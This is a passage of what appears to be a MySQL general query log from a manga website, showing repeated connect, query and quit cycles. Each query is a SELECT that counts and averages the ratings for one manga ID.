(sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '107' order by created desc 330654394 Quit 330654395 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654395 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '241' order by created desc 330654395 Quit 330654396 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654396 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '312' order by created desc 330654396 Quit 330654397 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654397 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '181' order by created desc 330654397 Quit 330654398 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654398 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '126' order by created desc 330654398 Quit 330654399 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654399 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '20' order by created desc 330654399 Quit 330654400 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654400 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '234' order by created desc 330654400 Quit 330654401 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654401 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '18' order by created desc 330654401 Quit 330654402 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654402 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '122' order by created desc 330654402 Quit 330654403 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654403 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '190' order by created desc 330654403 Quit 330654404 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654404 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '227' order by created desc 330654404 Quit 330654405 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654405 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '284' order by created desc 330654405 Quit 330654406 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654406 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '322' order by created desc 330654406 Quit 330654407 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654407 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '123' order by created desc 330654407 Quit 330654408 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654408 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '196' order by created desc 330654408 Quit 330654409 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654409 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '308' order by created desc 330654409 Quit 330654410 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654410 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '266' order by created desc 330654410 Quit 330654411 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654411 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '226' order by created desc 330654411 Quit 330654412 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654412 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '11' order by created desc 330654412 Quit 330654413 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654413 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '219' order by created desc 330654413 Quit 330654414 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654414 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '72' order by created desc 330654414 Quit 330654415 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654415 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '292' order by created desc 330654415 Quit 330654416 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654416 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '34' order by created desc 330654416 Quit 330654417 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654417 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '221' order by created desc 330654417 Quit 330654418 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654418 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '174' order by created desc 330654418 Quit 330654419 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654419 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '209' order by created desc 330654419 Quit 330654420 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654420 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '222' order by created desc 330654420 Quit 330654421 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654421 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '251' order by created desc 330654421 Quit 330654422 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654422 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '194' order by created desc 330654422 Quit 330654423 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654423 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '327' order by created desc 330654423 Quit 330654424 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654424 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '119' order by created desc 330654424 Quit 330654425 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654425 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '298' order by created desc 330654425 Quit 330654426 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654426 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '65' order by created desc 330654426 Quit 330654427 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654427 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '200' order by created desc 330654427 Quit 330654428 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654428 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '187' order by created desc 330654428 Quit 330654429 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654429 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '185' order by created desc 330654429 Quit 330654430 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654430 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '311' order by created desc 330654430 Quit 330654431 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654431 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '184' order by created desc 330654431 Quit 330654432 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654432 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '235' order by created desc 330654432 Quit 330654433 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654433 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '242' order by created desc 330654433 Quit 330654434 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654434 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '331' order by created desc 330654434 Quit 330654435 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654435 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '211' order by created desc 330654435 Quit 330654436 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654436 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '176' order by created desc 330654436 Quit 330654437 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654437 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '321' order by created desc 330654437 Quit 330654438 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654438 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '339' order by created desc 330654438 Quit 330654439 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654439 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '183' order by created desc 330654439 Quit 330654440 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654440 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '220' order by created desc 330654440 Quit 330654441 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654441 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '349' order by created desc 330654441 Quit 330654442 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654442 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '3' order by created desc 330654442 Quit 330654443 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654443 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '249' order by created desc 330654443 Quit 330654444 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654444 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '246' order by created desc 330654444 Quit 330654445 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654445 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '215' order by created desc 330654445 Quit 330654446 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654446 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '275' order by created desc 330654446 Quit 330654447 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654447 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '287' order by created desc 330654447 Quit 330654448 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654448 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '195' order by created desc 330654448 Quit 330654449 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654449 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '212' order by created desc 330654449 Quit 330654450 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654450 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '280' order by created desc 330654450 Quit 330654451 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654451 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '278' order by created desc 330654451 Quit 330654452 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654452 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '330' order by created desc 330654452 Quit 330654453 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654453 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '229' order by created desc 330654453 Quit 330654454 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654454 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '186' order by created desc 330654454 Quit 330654455 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654455 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '326' order by created desc 330654455 Quit 330654456 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654456 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '256' order by created desc 330654456 Quit 330654457 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654457 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '270' order by created desc 330654457 Quit 330654458 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654458 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '114' order by created desc 330654458 Quit 330654459 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654459 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '294' order by created desc 330654459 Quit 330654460 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654460 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '276' order by created desc 330654460 Quit 330654461 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654461 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '320' order by created desc 330654461 Quit 330654462 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654462 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '250' order by created desc 330654462 Quit 330654463 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654463 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '216' order by created desc 330654463 Quit 330654464 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654464 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '277' order by created desc 330654464 Quit 330654465 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654465 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '236' order by created desc 330654465 Quit 330654466 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654466 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '358' order by created desc 330654466 Quit 330654467 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654467 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '188' order by created desc 330654467 Quit 330654468 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654468 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '272' order by created desc 330654468 Quit 330654469 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654469 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '118' order by created desc 330654469 Quit 330654470 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654470 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '262' order by created desc 330654470 Quit 330654471 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654471 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '28' order by created desc 330654471 Quit 330654472 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654472 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '371' order by created desc 330654472 Quit 330654473 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654473 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '281' order by created desc 330654473 Quit 330654474 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654474 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '254' order by created desc 330654474 Quit 330654475 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654475 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '323' order by created desc 330654475 Quit 330654476 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654476 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '328' order by created desc 330654476 Quit 330654477 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654477 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '361' order by created desc 330654477 Quit 330654478 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654478 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '238' order by created desc 330654478 Quit 330654479 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654479 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '347' order by created desc 330654479 Quit 330654480 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654480 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '286' order by created desc 330654480 Quit 330654481 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654481 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '255' order by created desc 330654481 Quit 330654482 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654482 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '372' order by created desc 330654482 Quit 330654483 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654483 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '315' order by created desc 330654483 Quit 330654484 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654484 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '189' order by created desc 330654484 Quit 330654485 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654485 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '313' order by created desc 330654485 Quit 330654486 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654486 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '325' order by created desc 330654486 Quit 330654487 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654487 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '260' order by created desc 330654487 Quit 330654488 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654488 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '348' order by created desc 330654488 Quit 330654489 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654489 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '285' order by created desc 330654489 Quit 330654490 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654490 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '319' order by created desc 330654490 Quit 330654491 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654491 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '306' order by created desc 330654491 Quit 330654492 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654492 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '283' order by created desc 330654492 Quit 330654493 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654493 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '355' order by created desc 330654493 Quit 330654494 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654494 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '342' order by created desc 330654494 Quit 330654495 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654495 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '264' order by created desc 330654495 Quit 330654496 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654496 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '302' order by created desc 330654496 Quit 330654497 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654497 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '182' order by created desc 330654497 Quit 330654498 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654498 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '274' order by created desc 330654498 Quit 330654499 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654499 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '329' order by created desc 330654499 Quit 330654500 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654500 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '279' order by created desc 330654500 Quit 330654501 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654501 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '314' order by created desc 330654501 Quit 330654502 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654502 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '332' order by created desc 330654502 Quit 330654503 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654503 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '351' order by created desc 330654503 Quit 330654504 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654504 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '289' order by created desc 330654504 Quit 330654505 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654505 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '343' order by created desc 330654505 Quit 330654506 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654506 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '310' order by created desc 330654506 Quit 330654507 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654507 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '356' order by created desc 330654507 Quit 330654508 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654508 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '301' order by created desc 330654508 Quit 330654509 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654509 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '273' order by created desc 330654509 Quit 330654510 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654510 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '300' order by created desc 330654510 Quit 330654511 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654511 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '263' order by created desc 330654511 Quit 330654512 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654512 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '318' order by created desc 330654512 Quit 330654513 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654513 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '317' order by created desc 330654513 Quit 330654514 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654514 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '382' order by created desc 330654514 Quit 330654515 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654515 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '295' order by created desc 330654515 Quit 330654516 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654516 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '373' order by created desc 330654516 Quit 330654517 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654517 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '245' order by created desc 330654517 Quit 330654518 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654518 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '247' order by created desc 330654518 Quit 330654519 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654519 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '337' order by created desc 330654519 Quit 330654520 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654520 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '299' order by created desc 330654520 Quit 330654521 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654521 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '335' order by created desc 330654521 Quit 330654522 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654522 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '90' order by created desc 330654522 Quit 330654523 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654523 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '265' order by created desc 330654523 Quit 330654524 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654524 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '258' order by created desc 330654524 Quit 330654525 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654525 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '380' order by created desc 330654525 Quit 330654526 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654526 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '334' order by created desc 330654526 Quit 330654527 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654527 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '336' order by created desc 330654527 Quit 330654528 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654528 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '304' order by created desc 330654528 Quit 330654529 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654529 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '297' order by created desc 330654529 Quit 330654530 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654530 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '340' order by created desc 330654530 Quit 330654531 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654531 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '341' order by created desc 330654531 Quit 330654532 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654532 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '374' order by created desc 330654532 Quit 330654533 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654533 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '367' order by created desc 330654533 Quit 330654534 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654534 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '344' order by created desc 330654534 Quit 330654535 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654535 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '352' order by created desc 330654535 Quit 330654536 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654536 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '357' order by created desc 330654536 Quit 330654537 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654537 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '354' order by created desc 330654537 Quit 330654538 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654538 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '386' order by created desc 330654538 Quit 330654539 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654539 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '333' order by created desc 330654539 Quit 330654540 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654540 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '353' order by created desc 330654540 Quit 330654541 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654541 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '350' order by created desc 330654541 Quit 330654542 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654542 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '376' order by created desc 330654542 Quit 330654543 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654543 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '381' order by created desc 330654543 Quit 330654544 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654544 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '346' order by created desc 330654544 Quit 330654545 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654545 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '309' order by created desc 330654545 Quit 330654546 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654546 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '316' order by created desc 330654546 Quit 330654547 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330654547 Query select count(id) as total_rating, 